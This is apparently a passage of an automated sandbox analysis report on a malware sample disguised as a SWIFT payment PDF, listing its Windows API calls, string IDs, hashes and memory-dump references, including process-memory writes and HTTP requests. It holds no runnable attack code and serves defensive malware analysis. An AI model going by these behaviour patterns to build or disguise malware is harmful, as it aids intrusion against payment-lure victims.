                                                        • Associated: 00000000.00000002.1716780693.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716818701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_z20SWIFT_MT103_Payment_552016_pdf.jbxd
                                                        Similarity
                                                        • API ID: CloseCurrentExitFindHandleImageNonwritableSectionThread__freeptd__getptd_noexit
                                                        • String ID:
                                                        • API String ID: 3798957060-0
                                                        • Opcode ID: d3b08fe511e09ca6ea2d918a54b62a74066439bca0a0e456eaad9824bd7e2a02
                                                        • Instruction ID: 5ad9b57b40d8b41da6f03c32f2a15b2799e0bbfe2e5ad1689210a27a588f1b2a
                                                        • Opcode Fuzzy Hash: d3b08fe511e09ca6ea2d918a54b62a74066439bca0a0e456eaad9824bd7e2a02
                                                        • Instruction Fuzzy Hash: 29E01A31501A1197C2212BB9AC097DE3255AF01F36F944A6EF81A952A0DB6CD98147AD
                                                        APIs
                                                          • Part of subcall function 00411A35: _doexit.LIBCMT ref: 00411A41
                                                        • ___set_flsgetvalue.LIBCMT ref: 00415690
                                                          • Part of subcall function 00416A84: TlsGetValue.KERNEL32(00411739,00416C10,?,00411739,00417F28,00413979,?,?,00411739,?,00401C0B), ref: 00416A8D
                                                          • Part of subcall function 00416A84: __decode_pointer.LIBCMT ref: 00416A9F
                                                          • Part of subcall function 00416A84: TlsSetValue.KERNEL32(00000000,00411739,00417F28,00413979,?,?,00411739,?,00401C0B), ref: 00416AAE
                                                        • ___fls_getvalue@4.LIBCMT ref: 0041569B
                                                          • Part of subcall function 00416A64: TlsGetValue.KERNEL32(?,?,004140F1,00000000), ref: 00416A72
                                                        • ___fls_setvalue@8.LIBCMT ref: 004156AD
                                                          • Part of subcall function 00416AB8: __decode_pointer.LIBCMT ref: 00416AC9
                                                        • GetLastError.KERNEL32(00000000,?,00000000), ref: 004156B6
                                                        • ExitThread.KERNEL32 ref: 004156BD
                                                        • __freefls@4.LIBCMT ref: 004156D9
                                                        • __IsNonwritableInCurrentImage.LIBCMT ref: 004156EC
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1716710540.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1716693878.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716761486.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716818701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_z20SWIFT_MT103_Payment_552016_pdf.jbxd
                                                        Similarity
                                                        • API ID: Value$__decode_pointer$CurrentErrorExitImageLastNonwritableThread___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4_doexit
                                                        • String ID:
                                                        • API String ID: 1537469427-0
                                                        • Opcode ID: 99715b5f8e2ff19c7b8f3a2e2e0a417857e73ed83bc070766e6b29f9400adc7a
                                                        • Instruction ID: 6f4b581ce684dac4bce1a6396b1ab204a3b2196504341234b7a244e47b3a25b0
                                                        • Opcode Fuzzy Hash: 99715b5f8e2ff19c7b8f3a2e2e0a417857e73ed83bc070766e6b29f9400adc7a
                                                        • Instruction Fuzzy Hash: 83E0E6308003096BCF0037F29E1A9DF392DAD41389B52841E7E14B2122DE6DD9D1466D
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1716710540.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1716693878.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716761486.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716818701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_z20SWIFT_MT103_Payment_552016_pdf.jbxd
                                                        Similarity
                                                        • API ID: _malloc
                                                        • String ID: Default$|k
                                                        • API String ID: 1579825452-2254895183
                                                        • Opcode ID: fe63eafcbf49a8bd7e130050ab80df9f36c0768017d8013c96ff1411d005d718
                                                        • Instruction ID: 39a525bc613f0e7e9485e4ea944b13d532e73913c0a35fc25f8fa2b96209a7b9
                                                        • Opcode Fuzzy Hash: fe63eafcbf49a8bd7e130050ab80df9f36c0768017d8013c96ff1411d005d718
                                                        • Instruction Fuzzy Hash: 51F19F706083018BD714DF25C484A6BB7E5AF85314F64886FF885AB392D738EC55CB9B
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1716710540.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1716693878.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716761486.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716818701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_z20SWIFT_MT103_Payment_552016_pdf.jbxd
                                                        Similarity
                                                        • API ID: _memcmp
                                                        • String ID: '$[$h
                                                        • API String ID: 2931989736-1224472061
                                                        • Opcode ID: b65a2ba19e68ffe8a11284d2d069350b2f2ae6a9059e42b54d6f98484e49560c
                                                        • Instruction ID: c2eec353cbd26a418970a1643da97c958d9efd09d44d369c5aec2a2e92b02032
                                                        • Opcode Fuzzy Hash: b65a2ba19e68ffe8a11284d2d069350b2f2ae6a9059e42b54d6f98484e49560c
                                                        • Instruction Fuzzy Hash: EBE1B3756083858FE725CF28C8807ABBBE1FFC9304F18896EE89587341D7799849CB56
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1716710540.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1716693878.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716761486.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716818701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_z20SWIFT_MT103_Payment_552016_pdf.jbxd
                                                        Similarity
                                                        • API ID: _strncmp
                                                        • String ID: >$R$U
                                                        • API String ID: 909875538-1924298640
                                                        • Opcode ID: 83caccdc30ebaedd60eda3635d3ed4fa95617b34971efb7504fa10d53abc7e5a
                                                        • Instruction ID: f6794502b7c89560a677b30a08de70cb8bc1b17d125f16f135907c58c8460d8d
                                                        • Opcode Fuzzy Hash: 83caccdc30ebaedd60eda3635d3ed4fa95617b34971efb7504fa10d53abc7e5a
                                                        • Instruction Fuzzy Hash: 46E19C745083818FEB25CF29C49076BBBE1EFD9304F28496EE89587381D378E849CB56
                                                        APIs
                                                          • Part of subcall function 00442C52: _wcslen.LIBCMT ref: 00442C82
                                                        • CoInitialize.OLE32(00000000), ref: 0046CE18
                                                        • CoCreateInstance.OLE32(00482A50,00000000,00000001,004828B0,?), ref: 0046CE31
                                                        • CoUninitialize.OLE32 ref: 0046CE50
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1716710540.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1716693878.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716761486.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716818701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_z20SWIFT_MT103_Payment_552016_pdf.jbxd
                                                        Similarity
                                                        • API ID: CreateInitializeInstanceUninitialize_wcslen
                                                        • String ID: .lnk
                                                        • API String ID: 886957087-24824748
                                                        • Opcode ID: cf95cfa125c39178dc1728bd48ca6ee468afe444b27fb378bb5b47a8cf5920ff
                                                        • Instruction ID: 09ec1e36491b9dee8eccbfa157b0fc1a83632a56aae6c10d58f94140378ad3aa
                                                        • Opcode Fuzzy Hash: cf95cfa125c39178dc1728bd48ca6ee468afe444b27fb378bb5b47a8cf5920ff
                                                        • Instruction Fuzzy Hash: D3A1ABB5A042019FC704EF64C980E6BB7E9EF88714F14895EF8849B392D735EC45CBA6
                                                        Strings
                                                        • \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 00469C37
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1716710540.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1716693878.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716761486.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716818701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_z20SWIFT_MT103_Payment_552016_pdf.jbxd
                                                        Similarity
                                                        • API ID: _wcslen
                                                        • String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
                                                        • API String ID: 176396367-557222456
                                                        • Opcode ID: 6ed3ee7040cf52f7c8cf58c24b37417f7719ae2cfab6dfb5b0d2deafceea8a2b
                                                        • Instruction ID: 5ec49088f7a0f5eff408c40ec761cfb1cab3d77d8e9f1d748350f88cc39ab646
                                                        • Opcode Fuzzy Hash: 6ed3ee7040cf52f7c8cf58c24b37417f7719ae2cfab6dfb5b0d2deafceea8a2b
                                                        • Instruction Fuzzy Hash: 2C818F715183009FC310EF65C88186BB7E8AF85714F408A2FF5959B2A2E778ED45CB9B
                                                        APIs
                                                          • Part of subcall function 0041171A: _malloc.LIBCMT ref: 00411734
                                                        • VariantInit.OLEAUT32(00000000), ref: 0042D2E0
                                                        • VariantCopy.OLEAUT32(?,?), ref: 0042D2EE
                                                        • VariantClear.OLEAUT32(00000000), ref: 0042D2FF
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1716710540.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1716693878.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716761486.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716818701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_z20SWIFT_MT103_Payment_552016_pdf.jbxd
                                                        Similarity
                                                        • API ID: Variant$ClearCopyInit_malloc
                                                        • String ID: 4RH
                                                        • API String ID: 2981388473-749298218
                                                        • Opcode ID: e97e4296ef94c8687d9dbc7cabf6d8351411f7c1e92cc77c4417faa2011bd8bb
                                                        • Instruction ID: 2430bd0654d197d786bc988f6f01769df72c779a088326c60667d263ff95ce9f
                                                        • Opcode Fuzzy Hash: e97e4296ef94c8687d9dbc7cabf6d8351411f7c1e92cc77c4417faa2011bd8bb
                                                        • Instruction Fuzzy Hash: CC913874A083519FC720CF29D480A1AB7E1FF89304F64892EE999DB351D774EC85CB96
                                                        APIs
                                                          • Part of subcall function 0040FFF0: _wcslen.LIBCMT ref: 0040FFF2
                                                          • Part of subcall function 0040FFF0: _wcscpy.LIBCMT ref: 00410012
                                                        • __wcsnicmp.LIBCMT ref: 0046681A
                                                        • WNetUseConnectionW.MPR(00000000,?,00000000,?,00000000,?,00000000,?), ref: 004668B9
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1716710540.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1716693878.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716761486.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716818701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_z20SWIFT_MT103_Payment_552016_pdf.jbxd
                                                        Similarity
                                                        • API ID: Connection__wcsnicmp_wcscpy_wcslen
                                                        • String ID: LPT$HH
                                                        • API String ID: 3035604524-2728063697
                                                        • Opcode ID: 5eb10ea696a5c8712512111a677865b5ff762cf243299f6a0f098b498d25dbc6
                                                        • Instruction ID: 32c7950bcbaa764ae6d62266904c1b9f72d26d84b6ae022b5f72856ccecd4d84
                                                        • Opcode Fuzzy Hash: 5eb10ea696a5c8712512111a677865b5ff762cf243299f6a0f098b498d25dbc6
                                                        • Instruction Fuzzy Hash: 2151D5B16043009FC720EF65C881B1BB7E5AF85704F11491EFA859B382E779ED49C79A
                                                        APIs
                                                          • Part of subcall function 004374AF: WriteProcessMemory.KERNEL32(?,?,00000000,00000000,00000000,?,00461142,?), ref: 004374E2
                                                        • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 00438AB8
                                                          • Part of subcall function 00437472: ReadProcessMemory.KERNEL32(?,00000000,00000000,?,00000000,00000000,00460C33,?,00000000,?,00000202), ref: 004374A5
                                                        • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 00438B2F
                                                        • SendMessageW.USER32(00000000,00001111,00000000,00000000), ref: 00438BAF
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1716710540.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1716693878.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716761486.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716818701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_z20SWIFT_MT103_Payment_552016_pdf.jbxd
                                                        Similarity
                                                        • API ID: MessageSend$MemoryProcess$ReadWrite
                                                        • String ID: @
                                                        • API String ID: 4055202900-2766056989
                                                        • Opcode ID: 95f302c56ad406a71ba46a757bfca5032ac46bd5be6e99a0861c43b96ce9d769
                                                        • Instruction ID: 682097a2b5231093ce935cfc9f6f49684b756042c0be5430c67da702d62f7190
                                                        • Opcode Fuzzy Hash: 95f302c56ad406a71ba46a757bfca5032ac46bd5be6e99a0861c43b96ce9d769
                                                        • Instruction Fuzzy Hash: E6518FB2208304ABD310DB64CC81FEFB7A9EFC9714F04591EFA8597181D678F9498B66
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1716710540.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1716693878.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716761486.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716818701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_z20SWIFT_MT103_Payment_552016_pdf.jbxd
                                                        Similarity
                                                        • API ID: CrackInternet_memset_wcslen
                                                        • String ID: |
                                                        • API String ID: 915713708-2343686810
                                                        • Opcode ID: 49a329c21d3e2b60aa9c34259f3774bde857317d5b4f329263fe64f76368b085
                                                        • Instruction ID: 59fb16093b155e5aebf0565036b17e76eaaa1a90c891d08183ce313382d628e9
                                                        • Opcode Fuzzy Hash: 49a329c21d3e2b60aa9c34259f3774bde857317d5b4f329263fe64f76368b085
                                                        • Instruction Fuzzy Hash: AE417EB2754301ABD204EF69DC81B9BF7E8FB88714F00052EF64593290DB75E909CBA6
                                                        APIs
                                                        • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 0044A7FE
                                                        • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0044A851
                                                        • HttpQueryInfoW.WININET ref: 0044A892
                                                          • Part of subcall function 0044286A: GetLastError.KERNEL32(00000000,0044AA07,?,00000000,00000000,00000001,?,?), ref: 00442880
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1716710540.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1716693878.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716761486.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716818701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_z20SWIFT_MT103_Payment_552016_pdf.jbxd
                                                        Similarity
                                                        • API ID: Http$ErrorInfoInternetLastOpenQueryRequestSend
                                                        • String ID:
                                                        • API String ID: 3705125965-3916222277
                                                        • Opcode ID: 978b0a3adb57e12b693652f0a59e9f67067917ae502be6042813f4078819ed5c
                                                        • Instruction ID: e2ea4e726a01332d61d4ddbc0b4be6fd5f15ca60b5c099a75bcf819f780d651a
                                                        • Opcode Fuzzy Hash: 978b0a3adb57e12b693652f0a59e9f67067917ae502be6042813f4078819ed5c
                                                        • Instruction Fuzzy Hash: F431C6B56813416BE320EB16DC42F9FB7E8EFD9714F00091FF65057281D7A8A50D876A
                                                        APIs
                                                        • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013), ref: 00450A84
                                                        • GetWindowLongW.USER32(?,000000F0), ref: 00450AA2
                                                        • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 00450AB3
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1716710540.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1716693878.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716761486.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716818701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_z20SWIFT_MT103_Payment_552016_pdf.jbxd
                                                        Similarity
                                                        • API ID: Window$Long
                                                        • String ID: SysTreeView32
                                                        • API String ID: 847901565-1698111956
                                                        • Opcode ID: 8beaa76caf08e9d8622144d4cb1fe8de975b1c4a0fa94bb7914df260c0b4a9df
                                                        • Instruction ID: 1ec52148e0427fd314aa46f8515fbaae5756f8dde681787cc4d1a4a364837cef
                                                        • Opcode Fuzzy Hash: 8beaa76caf08e9d8622144d4cb1fe8de975b1c4a0fa94bb7914df260c0b4a9df
                                                        • Instruction Fuzzy Hash: 9831E670244301AFE710DB64CC84B6BB3E8EF98325F104A1EF9A5932D1D7B8AD85CB25
                                                        APIs
                                                        • LoadLibraryA.KERNEL32(?), ref: 00437CB2
                                                        • GetProcAddress.KERNEL32(?,AU3_GetPluginDetails), ref: 00437D26
                                                        • FreeLibrary.KERNEL32(?,?,AU3_GetPluginDetails), ref: 00437D3D
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1716710540.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1716693878.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716761486.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716818701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_z20SWIFT_MT103_Payment_552016_pdf.jbxd
                                                        Similarity
                                                        • API ID: Library$AddressFreeLoadProc
                                                        • String ID: AU3_GetPluginDetails
                                                        • API String ID: 145871493-4132174516
                                                        • Opcode ID: 4ebbef04180d6d8ca58d0a399137a5099e5303b836d8f8ecbcb6ac6e59c078aa
                                                        • Instruction ID: 909018a8305b4cb0ce841e730e5bf8c258fddf5044228ae68d4d210ccee2088c
                                                        • Opcode Fuzzy Hash: 4ebbef04180d6d8ca58d0a399137a5099e5303b836d8f8ecbcb6ac6e59c078aa
                                                        • Instruction Fuzzy Hash: 054147B96042019FC314DF68D8C4D5AF3E5FF8D304B20866EE9568B751DB35E802CB96
                                                        APIs
                                                        • DestroyWindow.USER32(00000000,004A83D8,00000000,?,?), ref: 00450C60
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1716710540.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1716693878.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716761486.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716818701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_z20SWIFT_MT103_Payment_552016_pdf.jbxd
                                                        Similarity
                                                        • API ID: DestroyWindow
                                                        • String ID: msctls_updown32
                                                        • API String ID: 3375834691-2298589950
                                                        • Opcode ID: 2a2b7300f3f0896f723b2acc27284ae87319393b418436251cb0663837fc8f9c
                                                        • Instruction ID: 6a1e1189e42626fde14bc74b9d87f1f450c181bb0fe7a510af516aef360d3f61
                                                        • Opcode Fuzzy Hash: 2a2b7300f3f0896f723b2acc27284ae87319393b418436251cb0663837fc8f9c
                                                        • Instruction Fuzzy Hash: CE31A279300201AFD624DF54DC81F5B73A9EB9A714F20451EF640AB382C7B4AC4ACB6A
                                                        APIs
                                                        • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 0045122A
                                                        • SendMessageW.USER32(00000000,00000186,00000000,00000000), ref: 00451238
                                                        • MoveWindow.USER32(?,?,00000000,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 0045125D
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1716710540.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1716693878.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716761486.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716818701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_z20SWIFT_MT103_Payment_552016_pdf.jbxd
                                                        Similarity
                                                        • API ID: MessageSend$MoveWindow
                                                        • String ID: Listbox
                                                        • API String ID: 3315199576-2633736733
                                                        • Opcode ID: ec94c338bdc408a6213732be15a93177a4dce0f95fa1299e59073e0341a0244e
                                                        • Instruction ID: bfe1e9b3800f224edd0053b2d0d87a77da448e7bf5b17050dc61905274d7532a
                                                        • Opcode Fuzzy Hash: ec94c338bdc408a6213732be15a93177a4dce0f95fa1299e59073e0341a0244e
                                                        • Instruction Fuzzy Hash: E421D3712043047BE6209A65DC81F6BB3E8EBCD735F104B1EFA60A72D1C675EC458729
                                                        APIs
                                                        • SetErrorMode.KERNEL32(00000001), ref: 0045D243
                                                        • GetVolumeInformationW.KERNEL32(?,?,000000FF,?,?,?,?,000000FF,?), ref: 0045D2C7
                                                        • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D30C
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1716710540.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1716693878.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716761486.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716818701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_z20SWIFT_MT103_Payment_552016_pdf.jbxd
                                                        Similarity
                                                        • API ID: ErrorMode$InformationVolume
                                                        • String ID: HH
                                                        • API String ID: 2507767853-2761332787
                                                        • Opcode ID: 10a78899cac0a24ca5bd241ff5c46140465ea67f957306f93882c0fc43b3d187
                                                        • Instruction ID: 4a708fd112bc3492f79fb502a293ca5b83a6a9b53d4ab80d782c21126568c1ab
                                                        • Opcode Fuzzy Hash: 10a78899cac0a24ca5bd241ff5c46140465ea67f957306f93882c0fc43b3d187
                                                        • Instruction Fuzzy Hash: 622148756083019FC310EF55D944A6BB7E4FF88704F40882EFA45972A2D774E909CB5A
                                                        APIs
                                                        • SetErrorMode.KERNEL32(00000001), ref: 0045D44A
                                                        • GetVolumeInformationW.KERNEL32(?,?,000000FF,?,?,?,?,000000FF,?), ref: 0045D4CE
                                                        • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D502
                                                        Strings
                                                        Memory Dump Source
